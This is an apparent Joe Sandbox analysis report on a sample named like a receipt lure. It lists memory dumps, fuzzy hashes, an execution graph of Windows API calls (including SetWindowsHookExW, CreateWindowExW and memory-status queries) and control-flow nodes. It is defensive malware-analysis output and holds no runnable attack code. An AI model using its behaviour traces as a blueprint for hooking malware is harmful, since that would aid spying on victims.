                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2bd194d4633a57707a7f1a22295f95e38de33059443a0b34faa30f247e3385eb
                • Instruction ID: 32b3b0b86b1a1c7820c177c741f36016c69fc067df7849792b9f5a2c75f29a3b
                • Opcode Fuzzy Hash: 2bd194d4633a57707a7f1a22295f95e38de33059443a0b34faa30f247e3385eb
                • Instruction Fuzzy Hash: D7E11874E012199FCB14DFA9D6809AEFBF2FF89305F248169D414AB356D770A942CFA0
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d1a46be4bdf231a82ca513cef6120bc4a5639dc47cffa8182b258ef633295a3e
                • Instruction ID: 0dc20ff7c53401eff1629ee63a6fc1e435d623d43b4d0d5e676ce7520b92811a
                • Opcode Fuzzy Hash: d1a46be4bdf231a82ca513cef6120bc4a5639dc47cffa8182b258ef633295a3e
                • Instruction Fuzzy Hash: DFC19E70A006018FD748EB69C598A6EBBF6FF88300F048469D406E73A2DF78ED45CB91
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e36e9c715b9209a8b5ccde43c164e9260e00b051bbf9a0d6b39d2fda414e852a
                • Instruction ID: c1e7f9accdf954c1e8b6801c25a9e441062a6999cfaee78c9f091286c88698a4
                • Opcode Fuzzy Hash: e36e9c715b9209a8b5ccde43c164e9260e00b051bbf9a0d6b39d2fda414e852a
                • Instruction Fuzzy Hash: AFA16C36E0021A8FCF09DFA5D8445AEB7F6FF84300B1545BAE815AB265DB39D916CB40
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 74f78ba452b334a7566000c83a0838611859567f13e3524406388c71510b5b46
                • Instruction ID: f4d1ea5ea6f5506461be8ba3fc0e8d0d21521daaf99b546b95631d90c7a42eb3
                • Opcode Fuzzy Hash: 74f78ba452b334a7566000c83a0838611859567f13e3524406388c71510b5b46
                • Instruction Fuzzy Hash: D4512A70E142198FDB14CFA9D5809AEFBF2BF89305F24C169D418AB316D7749A42CFA1
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6b7add6a3cb0ba5ccf3cd69b63c7922b2cbc8e8ff2d1bf4273d6c6adbb952eb0
                • Instruction ID: 4b9db2172c31363b034466db61f81d3816c3123c09d2f96fe2b6ec6b167031b6
                • Opcode Fuzzy Hash: 6b7add6a3cb0ba5ccf3cd69b63c7922b2cbc8e8ff2d1bf4273d6c6adbb952eb0
                • Instruction Fuzzy Hash: 9A513B70E152198FCB14CFA9C5809AEFBF2BF89304F24C169D418AB316D7309942CF61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $eq$4c]q$4c]q$heq$heq
                • API String ID: 0-4251209141
                • Opcode ID: 675e4def82788723eda9fc8c53347402a529cef05477fac58300945f5e041401
                • Instruction ID: caeb86a6291ed756ac837fb29d120a3736c49a1e0bec388301e9c2662b03583b
                • Opcode Fuzzy Hash: 675e4def82788723eda9fc8c53347402a529cef05477fac58300945f5e041401
                • Instruction Fuzzy Hash: 05A15874A006058FDB54DF28C584A6ABBF6FF88310F5984A9E509DB3B2DB71EC84CB51
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: ?$B$B$C$C
                • API String ID: 0-1150723364
                • Opcode ID: b632aae87b6eaacaf2ab64454af8527339219141c8bb7b2c2765f1b2c2ba649c
                • Instruction ID: 128c9d055a911a66ca8f5892f19c072b67c7c3bf4b15cf5f2a02cc97ed244078
                • Opcode Fuzzy Hash: b632aae87b6eaacaf2ab64454af8527339219141c8bb7b2c2765f1b2c2ba649c
                • Instruction Fuzzy Hash: A981C371E002048FCB98DFA9D9819ADBBF2FF89300F14856ED416AF351DB31AA05CB91

                Execution Graph

                Execution Coverage:11.3%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:224
                Total number of Limit Nodes:21
                execution_graph 33191 163b5f0 DuplicateHandle 33192 163b686 33191->33192 33367 5632750 33368 5632792 33367->33368 33369 5632798 GetModuleHandleW 33367->33369 33368->33369 33370 56327c5 33369->33370 33371 163afa0 33372 163afe6 GetCurrentProcess 33371->33372 33374 163b031 33372->33374 33375 163b038 GetCurrentThread 33372->33375 33374->33375 33376 163b075 GetCurrentProcess 33375->33376 33377 163b06e 33375->33377 33378 163b0ab 33376->33378 33377->33376 33379 163b0d3 GetCurrentThreadId 33378->33379 33380 163b104 33379->33380 33381 6437480 33382 64374a5 33381->33382 33386 6437717 33382->33386 33392 6437728 33382->33392 33383 6437507 33387 64376b9 33386->33387 33388 64376bd 33387->33388 33397 6437751 33387->33397 33402 6437760 33387->33402 33388->33383 33389 6437736 33389->33383 33393 6437729 33392->33393 33395 6437751 GlobalMemoryStatusEx 33393->33395 33396 6437760 GlobalMemoryStatusEx 33393->33396 33394 6437736 33394->33383 33395->33394 33396->33394 33398 6437795 33397->33398 33399 643776d 33397->33399 33407 64368a0 33398->33407 33399->33389 33403 6437795 33402->33403 33404 643776d 33402->33404 33405 64368a0 GlobalMemoryStatusEx 33403->33405 33404->33389 33406 64377b2 33405->33406 33406->33389 33408 6437838 GlobalMemoryStatusEx 33407->33408 33410 64377b2 33408->33410 33410->33389 33193 15ad0fc 33194 15ad114 33193->33194 33195 15ad16e 33194->33195 33200 5637ea0 33194->33200 33204 5638c08 33194->33204 33213 56350f4 33194->33213 33222 5637eb0 33194->33222 33201 5637ed6 33200->33201 33202 56350f4 CallWindowProcW 33201->33202 33203 5637ef7 33202->33203 33203->33195 33205 5638c18 33204->33205 33206 5638c79 33205->33206 33208 5638c69 33205->33208 33209 5638c77 33206->33209 33242 563521c 33206->33242 33226 5638da0 33208->33226 33231 5638e6c 33208->33231 33237 5638d90 33208->33237 33214 56350ff 33213->33214 33215 5638c79 33214->33215 33217 5638c69 33214->33217 33216 563521c CallWindowProcW 33215->33216 33218 5638c77 33215->33218 33216->33218 33219 5638da0 
CallWindowProcW 33217->33219 33220 5638d90 CallWindowProcW 33217->33220 33221 5638e6c CallWindowProcW 33217->33221 33219->33218 33220->33218 33221->33218 33223 5637ed6 33222->33223 33224 56350f4 CallWindowProcW 33223->33224 33225 5637ef7 33224->33225 33225->33195 33228 5638db4 33226->33228 33227 5638e40 33227->33209 33246 5638e4b 33228->33246 33249 5638e58 33228->33249 33232 5638e2a 33231->33232 33233 5638e7a 33231->33233 33235 5638e4b CallWindowProcW 33232->33235 33236 5638e58 CallWindowProcW 33232->33236 33234 5638e40 33234->33209 33235->33234 33236->33234 33239 5638da0 33237->33239 33238 5638e40 33238->33209 33240 5638e4b CallWindowProcW 33239->33240 33241 5638e58 CallWindowProcW 33239->33241 33240->33238 33241->33238 33243 5635227 33242->33243 33244 563a35a CallWindowProcW 33243->33244 33245 563a309 33243->33245 33244->33245 33245->33209 33247 5638e69 33246->33247 33252 563a291 33246->33252 33247->33227 33250 5638e69 33249->33250 33251 563a291 CallWindowProcW 33249->33251 33250->33227 33251->33250 33253 563521c CallWindowProcW 33252->33253 33254 563a2aa 33253->33254 33254->33247 33411 15ad01c 33412 15ad034 33411->33412 33413 15ad087 33412->33413 33416 563f9a8 33412->33416 33420 563f998 33412->33420 33417 563fafa 33416->33417 33418 563f9c1 33416->33418 33417->33413 33418->33417 33419 16326e9 2 API calls 33418->33419 33419->33417 33421 563f9c1 33420->33421 33422 563fafa 33420->33422 33421->33422 33423 16326e9 2 API calls 33421->33423 33422->33413 33423->33422 33446 563c989 33447 563c992 33446->33447 33448 563c9b3 33446->33448 33447->33448 33449 563bbd0 OleInitialize 33447->33449 33449->33448 33178 563c668 33179 563c970 33178->33179 33180 563c690 33178->33180 33181 563c699 33180->33181 33184 563bbb4 33180->33184 33183 563c6bc 33185 563bbbf 33184->33185 33187 563c9b3 33185->33187 33188 563bbd0 33185->33188 33187->33183 33189 563c9e8 OleInitialize 33188->33189 33190 563ca4c 33189->33190 33190->33187 33255 1639f48 33256 1639f56 33255->33256 33259 16396c4 33256->33259 
33258 1639f5f 33260 16396cf 33259->33260 33263 1639c68 33260->33263 33262 163a065 33262->33258 33264 1639c73 33263->33264 33267 1639cd0 33264->33267 33266 163a125 33266->33262 33268 1639cdb 33267->33268 33271 163a5a4 33268->33271 33270 163aa12 33270->33266 33272 163a5af 33271->33272 33275 163ae10 33272->33275 33274 163af24 33274->33270 33276 163ae1b 33275->33276 33278 163e353 33276->33278 33283 5631520 33276->33283 33287 5631530 33276->33287 33277 163e391 33277->33274 33278->33277 33291 5631370 33278->33291 33296 5631380 33278->33296 33284 563153c 33283->33284 33301 16326e9 33284->33301 33285 563157d 33285->33278 33288 563153c 33287->33288 33290 16326e9 2 API calls 33288->33290 33289 563157d 33289->33278 33290->33289 33292 56313a1 33291->33292 33293 56313c5 33292->33293 33330 56319e8 33292->33330 33334 5631a08 33292->33334 33293->33277 33298 56313a1 33296->33298 33297 56313c5 33297->33277 33298->33297 33299 56319e8 4 API calls 33298->33299 33300 5631a08 4 API calls 33298->33300 33299->33297 33300->33297 33302 1632709 33301->33302 33303 16327aa 33302->33303 33306 5636b08 33302->33306 33310 5636aed 33302->33310 33303->33285 33307 5636b21 33306->33307 33314 5636fb0 33307->33314 33308 5636b5d 33308->33303 33311 5636b21 33310->33311 33313 5636fb0 2 API calls 33311->33313 33312 5636b5d 33312->33303 33313->33312 33315 5636efe 33314->33315 33317 5636fb3 33314->33317 33315->33308 33316 563705b 33316->33308 33317->33316 33320 56373c0 33317->33320 33325 56373d0 33317->33325 33323 56373d0 33320->33323 33321 5637620 33321->33316 33322 5637cf3 CreateWindowExW 33324 5637d54 33322->33324 33323->33321 33323->33322 33324->33324 33328 56373e5 33325->33328 33326 5637620 33326->33316 33327 5637cf3 CreateWindowExW 33329 5637d54 33327->33329 33328->33326 33328->33327 33329->33329 33331 56319ed 33330->33331 33332 5631a4e 33331->33332 33338 56315f8 33331->33338 33332->33293 33335 5631a15 33334->33335 33336 5631a4e 33335->33336 33337 56315f8 4 API calls 33335->33337 33336->33293 
33337->33336 33339 5631603 33338->33339 33341 5631ac0 33339->33341 33342 563162c 33339->33342 33341->33341 33343 5631637 33342->33343 33350 5631fd0 33343->33350 33354 5631fbf 33343->33354 33344 5631b3e 33348 56358c8 CreateWindowExW CreateWindowExW 33344->33348 33349 56358d8 CreateWindowExW CreateWindowExW 33344->33349 33345 5631b69 33345->33341 33348->33345 33349->33345 33351 5631ffe 33350->33351 33352 56320ca KiUserCallbackDispatcher 33351->33352 33353 56320cf 33351->33353 33352->33353 33355 5631ffe 33354->33355 33356 56320ca KiUserCallbackDispatcher 33355->33356 33357 56320cf 33355->33357 33356->33357 33358 5633e48 33359 5633e5c 33358->33359 33360 5633e6e 33359->33360 33361 5631520 2 API calls 33359->33361 33362 5631530 2 API calls 33359->33362 33361->33360 33362->33360 33363 1637ac8 33364 1637b0c SetWindowsHookExW 33363->33364 33366 1637b52 33364->33366 33424 163d738 33426 163d766 33424->33426 33428 163ced8 33426->33428 33427 163d786 33429 163cee3 33428->33429 33430 163e5bc 33429->33430 33431 163e617 33429->33431 33432 5631370 4 API calls 33429->33432 33433 5631380 4 API calls 33429->33433 33430->33431 33436 563d2c9 33430->33436 33441 563d2d8 33430->33441 33431->33427 33432->33430 33433->33430 33438 563d2ce 33436->33438 33437 563bc30 PeekMessageW 33437->33438 33438->33437 33439 563d38a 33438->33439 33440 563d7a0 WaitMessage 33438->33440 33439->33431 33440->33438 33444 563d33d 33441->33444 33442 563bc30 PeekMessageW 33442->33444 33443 563d7a0 WaitMessage 33443->33444 33444->33442 33444->33443 33445 563d38a 33444->33445 33445->33431

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1944 56373d0-56373f6 1947 5637426-563742e 1944->1947 1948 56373f8-5637420 call 56319ac call 563289c 1944->1948 1950 5637430-5637435 call 5635044 1947->1950 1951 5637474-56374ae call 5635050 1947->1951 1948->1947 1960 563762c-5637653 1948->1960 1956 563743a-563746f 1950->1956 1969 56374b4-56374ff 1951->1969 1970 563765a-563768c 1951->1970 1965 5637502-563755b call 56319ac call 563505c 1956->1965 1960->1970 1993 5637560-5637564 1965->1993 1969->1965 1985 5637693-5637c96 1970->1985 1999 5637ca1-5637ca8 1985->1999 2000 5637c98-5637c9e 1985->2000 1994 5637620-563762b 1993->1994 1995 563756a-5637577 1993->1995 2001 563757d-56375aa call 56319ac call 5635050 1995->2001 2002 563761c-563761e 1995->2002 2003 5637cb3-5637d52 CreateWindowExW 1999->2003 2004 5637caa-5637cb0 1999->2004 2000->1999 2001->2002 2019 56375ac-56375b9 2001->2019 2002->1985 2002->1994 2007 5637d54-5637d5a 2003->2007 2008 5637d5b-5637d93 2003->2008 2004->2003 2007->2008 2017 5637da0 2008->2017 2018 5637d95-5637d98 2008->2018 2021 5637da1 2017->2021 2018->2017 2019->2002 2020 56375bb-56375d2 call 56319ac call 5635068 2019->2020 2026 56375d4-56375dd call 563505c 2020->2026 2027 56375df-563760e call 563505c 2020->2027 2021->2021 2026->2002 2027->2002 2035 5637610-563761a 2027->2035 2035->2002 2035->2027
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: s.
                • API String ID: 0-1022735206
                • Opcode ID: a47e16a1e896e5cf401d199f5ea250442afb3d2788e41834feee0c80524387e8
                • Instruction ID: 8df094f8df6fd66167a6a09edd216424118a35c018804234aaf89fa022b76e4a
                • Opcode Fuzzy Hash: a47e16a1e896e5cf401d199f5ea250442afb3d2788e41834feee0c80524387e8
                • Instruction Fuzzy Hash: 32D14CB0E007059FCB14DF69D894AAEBBF6FF88310B108929D80A9B750DB74E945CF94
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a113348c25436dfa524a3d46e78186077a3da5b98867142774dab2effc233444
                • Instruction ID: a1be28446ff7080168b018b0271cf281e86834886d3631226ea2e0ad9fb05ccf
                • Opcode Fuzzy Hash: a113348c25436dfa524a3d46e78186077a3da5b98867142774dab2effc233444
                • Instruction Fuzzy Hash: 92F14C30A00209CFDB14DFA9C985BADBBF2FF48344F158569E419AB3A5DB74E945CB80

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1074 163af90-163b02f GetCurrentProcess 1078 163b031-163b037 1074->1078 1079 163b038-163b06c GetCurrentThread 1074->1079 1078->1079 1080 163b075-163b0a9 GetCurrentProcess 1079->1080 1081 163b06e-163b074 1079->1081 1082 163b0b2-163b0cd call 163b4ff 1080->1082 1083 163b0ab-163b0b1 1080->1083 1081->1080 1087 163b0d3-163b102 GetCurrentThreadId 1082->1087 1083->1082 1088 163b104-163b10a 1087->1088 1089 163b10b-163b16d 1087->1089 1088->1089
                APIs
                • GetCurrentProcess.KERNEL32 ref: 0163B01E
                • GetCurrentThread.KERNEL32 ref: 0163B05B
                • GetCurrentProcess.KERNEL32 ref: 0163B098
                • GetCurrentThreadId.KERNEL32 ref: 0163B0F1
                Memory Dump Source
                • Source File: 00000009.00000002.4558217312.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_1630000_Recaipt202431029.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: e3fb1ff6579f97debe293116fd042778947420a11e748a3d94f5c15fddaf441b
                • Instruction ID: edb84f1b10dd48f7b748aa7409a3d8b1d903bef64234f260af3597448de8bdb6
                • Opcode Fuzzy Hash: e3fb1ff6579f97debe293116fd042778947420a11e748a3d94f5c15fddaf441b
                • Instruction Fuzzy Hash: 3C5156B09003098FDB14DFA9D948BAEBFF5FF88314F208419E519A7360DB746988CB65

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1096 163afa0-163b02f GetCurrentProcess 1100 163b031-163b037 1096->1100 1101 163b038-163b06c GetCurrentThread 1096->1101 1100->1101 1102 163b075-163b0a9 GetCurrentProcess 1101->1102 1103 163b06e-163b074 1101->1103 1104 163b0b2-163b0cd call 163b4ff 1102->1104 1105 163b0ab-163b0b1 1102->1105 1103->1102 1109 163b0d3-163b102 GetCurrentThreadId 1104->1109 1105->1104 1110 163b104-163b10a 1109->1110 1111 163b10b-163b16d 1109->1111 1110->1111
                APIs
                • GetCurrentProcess.KERNEL32 ref: 0163B01E
                • GetCurrentThread.KERNEL32 ref: 0163B05B
                • GetCurrentProcess.KERNEL32 ref: 0163B098
                • GetCurrentThreadId.KERNEL32 ref: 0163B0F1
                Memory Dump Source
                • Source File: 00000009.00000002.4558217312.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_1630000_Recaipt202431029.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: f63c91a39db063b5dfad49588973f032085a7d690068731115fd26fb4e048674
                • Instruction ID: d567acea9ee3e52b0732174d6281b951a2d2301e146f332a4a327bfe458e10c4
                • Opcode Fuzzy Hash: f63c91a39db063b5dfad49588973f032085a7d690068731115fd26fb4e048674
                • Instruction Fuzzy Hash: 0F5157B09003498FDB14DFA9D548BAEBFF5FF88304F208459E519A7360DB356988CB65
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,00000000,?), ref: 05637D42
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: baea1cd8cdc4148b809b15339d7d2c44f9c08991ddf68548db7b40e3567a062c
                • Instruction ID: 5bb8bd29dd5110f9d8792dbf7fcf850dc50712a6600f6c5eadb3500f5a55710a
                • Opcode Fuzzy Hash: baea1cd8cdc4148b809b15339d7d2c44f9c08991ddf68548db7b40e3567a062c
                • Instruction Fuzzy Hash: AB51C0B1D103099FDB14CFA9C984ADEBFB5FF48310F24812AE819AB210D774A945CF90
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,00000000,?), ref: 05637D42
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: fd84e8f0abdf427633e42864d33020a76492a641398a79a1ccef7232e9531ead
                • Instruction ID: 6235f256b1a7c15c6228e4b0c5f5995044d6ab3d784d6c3958ff86e767274306
                • Opcode Fuzzy Hash: fd84e8f0abdf427633e42864d33020a76492a641398a79a1ccef7232e9531ead
                • Instruction Fuzzy Hash: BC41B0B1D003099FDB14CFA9C884ADEBBB5FF48310F24812AE819AB210D775A985CF90
                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0563A381
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                • Opcode ID: 954e642e1edf23910f03c34762bd7333aae731bf3e92184a7981855fb0c7594a
                • Instruction ID: 6852eb2c7bc828757aa3031ad226e7b7b04a4d1265dc4ea11ba255636865afd9
                • Opcode Fuzzy Hash: 954e642e1edf23910f03c34762bd7333aae731bf3e92184a7981855fb0c7594a
                • Instruction Fuzzy Hash: A34138B4900309CFDB14CF99C489AAABBF5FF88314F24C459E559AB721D735A845CBA0
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0163B677
                Memory Dump Source
                • Source File: 00000009.00000002.4558217312.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_1630000_Recaipt202431029.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 8bffa1b5dad2b8dd41c609475550137676ee17dfee24c5cbbd4985b90802bad6
                • Instruction ID: 0e4d758c53d14c051578477b4ef3a814e2970274af344c4f6d0c92a0605b5a1f
                • Opcode Fuzzy Hash: 8bffa1b5dad2b8dd41c609475550137676ee17dfee24c5cbbd4985b90802bad6
                • Instruction Fuzzy Hash: 5B21D2B59002089FDB10CF9AD984ADEBFF4FB48320F14841AE918A3251D378A944CFA0
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0163B677
                Memory Dump Source
                • Source File: 00000009.00000002.4558217312.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_1630000_Recaipt202431029.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: d3ccd07bc71b325cb33831cf077a682b6166d7c144fca6af92408054a5293a58
                • Instruction ID: 5075f6386e41940791ef7b8c52c61eaf4fbcbfdb336166862a4cf23f8bc368f0
                • Opcode Fuzzy Hash: d3ccd07bc71b325cb33831cf077a682b6166d7c144fca6af92408054a5293a58
                • Instruction Fuzzy Hash: 7C21C4B59002589FDB10CF9AD984ADEBFF9FB49310F14841AE918A3351D378A944CFA5
                APIs
                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01637B43
                Memory Dump Source
                • Source File: 00000009.00000002.4558217312.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_1630000_Recaipt202431029.jbxd
                Similarity
                • API ID: HookWindows
                • String ID:
                • API String ID: 2559412058-0
                • Opcode ID: 9779200b2d6a00cc9a1c0c95f550866b891202dd86e9b11ebaf6d481d95ccc15
                • Instruction ID: b4c8c52fc7d1ca5b0e126e2cd84fe9bdd0274c4d68de7c6041e924d3126143fb
                • Opcode Fuzzy Hash: 9779200b2d6a00cc9a1c0c95f550866b891202dd86e9b11ebaf6d481d95ccc15
                • Instruction Fuzzy Hash: AE2115B59002098FDB14DFA9D844BEEFBF5FF88310F10842AE559A7250CB78A945CFA1
                APIs
                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01637B43
                Memory Dump Source
                • Source File: 00000009.00000002.4558217312.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_1630000_Recaipt202431029.jbxd
                Similarity
                • API ID: HookWindows
                • String ID:
                • API String ID: 2559412058-0
                • Opcode ID: a2ca100afd7b8e069d563edec856a589d7a1ca031bc1e9725bc330ff5474a68e
                • Instruction ID: 680a25f7b7b433c8d17c01a608399c52fd2377a28f76d53118add588bdda9d08
                • Opcode Fuzzy Hash: a2ca100afd7b8e069d563edec856a589d7a1ca031bc1e9725bc330ff5474a68e
                • Instruction Fuzzy Hash: 2B2115B59002098FDB14DFAAC844BEEFBF5FF88310F10842AE519A7250CB74A945CFA1
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 056327B6
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: f4eb1b4e301d0ece5b12a6171996bd69f6b7dc669fce754278618969be9edaf4
                • Instruction ID: a50a52cc16d5b272b10262ffb6b635ea46689ffc662d604d0c9e1e577f947d2d
                • Opcode Fuzzy Hash: f4eb1b4e301d0ece5b12a6171996bd69f6b7dc669fce754278618969be9edaf4
                • Instruction Fuzzy Hash: AA111FBAC043498FCB20CFAAC444A9EBBF5AF89310F14846AD419B7610C338A545CFA1
                APIs
                • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0563D4BA,00000000,00000000,0415DAF8,030C76C4), ref: 0563D908
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: MessagePeek
                • String ID:
                • API String ID: 2222842502-0
                • Opcode ID: 753cf6c32cd7e39ff441345ce450633b13720db57e4871e813057aaa68e69cc1
                • Instruction ID: 68a4b0af9de8ce86e5c6d37025f498e6c2793e3e0e8873755272e903a3e15171
                • Opcode Fuzzy Hash: 753cf6c32cd7e39ff441345ce450633b13720db57e4871e813057aaa68e69cc1
                • Instruction Fuzzy Hash: DA1114B18002099FCB10DF9AD485BEEBBF8FB08310F10842AE959A3251D378A944CFA5
                APIs
                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,064377B2), ref: 0643789F
                Memory Dump Source
                • Source File: 00000009.00000002.4568245356.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_6430000_Recaipt202431029.jbxd
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID:
                • API String ID: 1890195054-0
                • Opcode ID: 893fd9f4ec3f8e48dc381204178b40544a9b36697dd0b60d556b461a1d9d4a70
                • Instruction ID: a3f68d5f3ebc5caea984e0a9181f53c960ce7e10aa45425c1acb1a268a8ccc6f
                • Opcode Fuzzy Hash: 893fd9f4ec3f8e48dc381204178b40544a9b36697dd0b60d556b461a1d9d4a70
                • Instruction Fuzzy Hash: 191103B1C006599BDB10DF9AC4446AEFBF4EF48320F14816AE918A7240D778A944CFE5
                APIs
                • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0563D4BA,00000000,00000000,0415DAF8,030C76C4), ref: 0563D908
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: MessagePeek
                • String ID:
                • API String ID: 2222842502-0
                • Opcode ID: 1b42ab7361657718dd70ca8616a9cae226a9a815ffb7fcec0193efd867f97695
                • Instruction ID: 5258ac1402dc6ba319f87f4b18a73a1c78c29f82e8e105f915bb8f626e90a560
                • Opcode Fuzzy Hash: 1b42ab7361657718dd70ca8616a9cae226a9a815ffb7fcec0193efd867f97695
                • Instruction Fuzzy Hash: 6F1126B5C00249DFDB10CF9AD984BDEBBF5FB08360F10842AE559A3250D378A645CFA1
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 056327B6
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
